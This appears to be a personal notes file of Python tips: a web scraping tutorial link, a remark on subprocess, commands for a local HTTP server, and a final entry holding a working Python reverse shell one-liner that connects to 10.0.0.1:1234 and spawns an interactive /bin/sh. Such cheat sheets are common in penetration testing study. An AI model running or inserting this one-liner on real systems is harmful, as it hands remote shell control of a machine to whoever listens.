# resources , tips and cmds

web scraping

https://realpython.com/python-web-scraping-practical-introduction/



# cmd
subproccess - run foreground and waits to finish


# directory listening
Python 3: python -m http.server --bind 127.0.0.1 8080 // python -m  http.server 8000
Python 2: python -m SimpleHTTPServer 8080


#reverse shell pentestmonkey python 2.7 >
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'